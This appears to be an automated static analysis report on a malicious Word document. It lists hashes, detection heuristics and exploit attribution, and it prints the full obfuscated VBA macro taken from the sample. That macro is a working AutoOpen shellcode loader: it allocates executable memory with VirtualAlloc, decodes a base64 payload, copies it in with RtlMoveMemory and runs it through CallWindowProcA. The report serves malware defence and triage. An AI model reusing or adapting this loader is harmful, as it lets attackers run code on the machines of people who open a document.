Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c63f7b0050891ca1…

MALICIOUS

Office (OLE)

286.5 KB Created: 2016-08-15 14:16:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: ae11b66cd1d25c77a0a0e368b5726f00 SHA-1: 24657ed56c47ffa15102d638e0ff5290b82406a1 SHA-256: c63f7b0050891ca19b26156f31091c36beb020dc24fa4c3e3126d7baf809eadf
188 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.005 Visual Basic

The sample is a malicious Microsoft Word document that leverages the CVE-2007-3899 vulnerability, a memory corruption flaw, to achieve code execution. The presence of VirtualAlloc API calls and the AutoOpen macro indicate that the document is designed to run malicious code, likely to download and execute a secondary payload. The VBA macros are present and appear to be involved in the execution chain.

Heuristics 6

  • CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899
    Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
  • ClamAV: Doc.Downloader.Bendis-6744751-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Bendis-6744751-0
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    #End If
Sub AutoOpen()
#If Win64 Then

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7802 bytes
SHA-256: 3a00bbeaf7b26596ae63b57f3feadf54f6bd91aef1193f0e9f269d47618c9dc2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If Win64 Then
Private Declare PtrSafe Function veery Lib "kernel32" Alias "VirtualAlloc" (ByVal lpaddr As LongPtr, ByVal dwSize As LongPtr, ByVal flAllocationType As LongPtr, ByVal flProtect As LongPtr) As LongPtr
Private Declare PtrSafe Function livy Lib "user32" Alias "EndDialog" (ByVal hDlg As LongPtr,nResult As LongPtr) As LongPtr
Private Declare PtrSafe Function parliamentary Lib "user32" Alias "CallWindowProcA" (lpPrevWndFunc As LongPtr, hWnd As Any, Msg As Any, wParam As Any, lParam As Any) As LongPtr
Private Declare PtrSafe Function pierching Lib "kernel32" Alias "CreateEventA" (lpEventAttributes As Any,bManualReset As LongPtr,bInitialState As LongPtr,lpName As String)
Private Declare PtrSafe Sub beau Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As LongPtr)
Private Declare PtrSafe Function eponym Lib "kernel32" Alias "GetPriorityClass" (hProcess As LongPtr) As LongPtr
Private Declare PtrSafe Function inaudibly Lib "user32" Alias "GetDlgItem" (ByVal hDlg As LongPtr, nIDDlgItem As LongPtr) As LongPtr

#Else
Private Declare Function payena Lib "kernel32" Alias "CreateEventA" (lpEventAttributes As Any, bManualReset As Long, bInitialState As Long, lpName As String)
Private Declare Function genus Lib "kernel32" Alias "GetPriorityClass" (hProcess As Long) As Long
Private Declare Function veery Lib "kernel32" Alias "VirtualAlloc" (ByVal lpaddr As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function myxocephalus Lib "user32" Alias "GetDlgItem" (ByVal hDlg As Long, nIDDlgItem As Long) As Long
Private Declare Function moraine Lib "user32" Alias "EndDialog" (ByVal hDlg As Long, nResult As Long) As Long
Private Declare Function parliamentary Lib "user32" Alias "CallWindowProcA" (lpPrevWndFunc As Long, hWnd As Any, Msg As Any, wParam As Any, lParam As Any) As Long
Private Declare Sub beau Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)

#End If
Sub AutoOpen()
#If Win64 Then
tribes
#ElseIf Win32 Then
pachycephalosaur = "alveolitis"
tribes
#Else
#End If
End Sub
Sub InsertSymbolMethod()
   Dim MyRange As Object
   Set MyRange = ActiveDocument.Range
   ' Selection Example:
   Selection.InsertSymbol CharacterNumber:=171, _
      Font:="Symbol", Unicode:=False
   ' Range Example:
   MyRange.Collapse Direction:=wdCollapseStart
   MyRange.InsertSymbol CharacterNumber:=171, _
      Font:="Symbol", Unicode:=False
End Sub

Sub tribes()
Dim apex As Variant
Dim cutlassfish As String
carposporic = perstringe.lubricitate
concessive = dibatter.avowal(carposporic)
niobrara = 6 - 3
Select Case niobrara
Case 1 To 5
megadeath = "monosyllable"
earsplitting = LCase("bu") + Mid("ficaccansubsequence", 5, 4) + StrReverse("rei")
Case 6
catacala = catacala * 4
Case 9
companionship = "deafanddumb"
bulbaceous = "deepen"
End Select

tenter = "spatterdash"
#If Win64 Then
Dim absorption As LongPtr
#Else
Dim absorption As Long
#End If
messianic = 0
absorption = veery(messianic, 4067, &H1000, &H40)
brotula = "uturn"
Dim actor As String
buttony = "hoheria"
leftish = "slim"
actor = ActiveDocument.FullName
For naming = 38 To 50
cementation = 50
cinerary = "extracting"
crabbe = StrReverse("raf") + Left("kleberryearthflax", 8)
crabbe = StrReverse("cxe") + StrReverse("tatigo") + LCase("IOn")
Next naming

Dim fertilizer() As Byte
fertilizer = concessive
attrition = "gallop"
beau ByVal absorption, fertilizer(0), UBound(fertilizer) + 1
abranchiate = "incautious"
#If Win64 Then
Dim seasonally As Long
clearage = "decent"
anathema = Mid("indigenousgrahighmindedness", 11, 3) & Mid("emergingndchidisarrange", 9, 5) & UCase("lD")
uncrannied = "peripheral"
collate = 576
#ElseIf Win32 Then
collate = 2214
#End If
Dim afterwards As Byte
Dim mithraist As Long
preclude = parliamentary(ByVal absorption + collate, actor, 0, 0, 0)
coparceny = 96
magnas = 89
If coparceny + magnas < 47 Then
coparceny = "fu" & "lcru" & Right("shikokum", 1)
autographed = Left("clocatmint", 3) + StrReverse("cuotdu") + StrReverse("gnih")
Else
magnas = 56
End If

End Sub



Attribute VB_Name = "dibatter"
Function avowal(horrified) As String
Dim kenaf(255) As Byte
Dim billhook() As Byte
Dim hemophiliac As Long
Dim bagatelle(63) As Long
Dim needle(63) As Long
Dim heavenborn As Integer
Dim breakfast(63) As Long
Dim tough As Long
Dim embonpoint As String
cinerary = "cytosine"

Dim countercharm() As Byte
Dim visavis As Long
nefariousness = "automaton"

Dim reclaimed As Long
handclap = 258048
burhinidae = 13 - 43 + 65566
apartments = 256
innovate = 33 - 35 + 66
churchdom = 85 + 36 - 66 + 4041
molehill = 4032
future = 262144
muesli = 71 + 16711609
convocation = 89 + 59 - 108 + 23
clanking = 47 + 65233
perceptibility = 60 - 108 + 14 + 289
rigatoni = 119 - 7 + 16514960
Dim agential As Byte
Dim glossitis() As Byte
ReDim glossitis(Len(horrified) - 1)
For i = 1 To Len(horrified)
glossitis(i - 1) = CByte(Asc(Mid(horrified, i, 1)))
Next
Dim grpou As Long
For anthropomorphic = 39 To 62
livable = 62
cinerary = nefariousness
archaeornithes = Mid("xerographycobarway", 11, 2) & LCase("NvEn") & "ient"
archaeornithes = LCase("mIcRO") + Right("snakebitepaleont", 7) + StrReverse("ygolo")
Next anthropomorphic

heavenborn = 0
pholidae = 24 + 98
dense = 2 - 8 + 261
For hemophiliac = 0 To dense
Select Case hemophiliac
Case 65 To 90
kenaf(hemophiliac) = hemophiliac - 65
Case 97 To pholidae
kenaf(hemophiliac) = hemophiliac - 71
Case 48 To 57
kenaf(hemophiliac) = hemophiliac + 4
Case 43
kenaf(hemophiliac) = 62
Case 47
kenaf(hemophiliac) = 63
End Select
Next hemophiliac
For hemophiliac = 0 To 63
breakfast(hemophiliac) = hemophiliac * innovate
needle(hemophiliac) = hemophiliac * churchdom
bagatelle(hemophiliac) = hemophiliac * future
Next hemophiliac
countercharm = glossitis
sow = 4
ReDim billhook((((UBound(countercharm) + 1) \ sow) * 3) - 1)
For tough = 0 To UBound(countercharm) Step 4
cannibalistic = countercharm(tough)
exacting = 3
visavis = bagatelle(kenaf(cannibalistic)) + needle(kenaf(countercharm(tough + 1))) + _
breakfast(kenaf(countercharm(tough + 2))) + kenaf(countercharm(tough + exacting))
hemophiliac = visavis And muesli
billhook(reclaimed) = hemophiliac \ burhinidae
hemophiliac = visavis And clanking
billhook(reclaimed + 1) = hemophiliac \ apartments
billhook(reclaimed + 2) = visavis And perceptibility
reclaimed = reclaimed + 3
Next tough
avowal = billhook
End Function

Sub PasteMethod()
   Dim MyRange As Object
   Set MyRange = Selection.Range
   ' Selection Example:
   Selection.Paste
   ' Range Example:
   MyRange.Collapse Direction:=wdCollapseStart
   MyRange.Paste
End Sub



Attribute VB_Name = "perstringe"
Attribute VB_Base = "0{1F612FAD-FA4C-4F31-9E66-B1BD10DFC9E3}{65B0A119-9317-4279-89BF-4B412EA6B07D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{2BFDCFCA-2681-4A0B-B31A-F3B63CDA4DE3}{51983526-3DDA-4EBF-9A87-D6F2F51942A2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.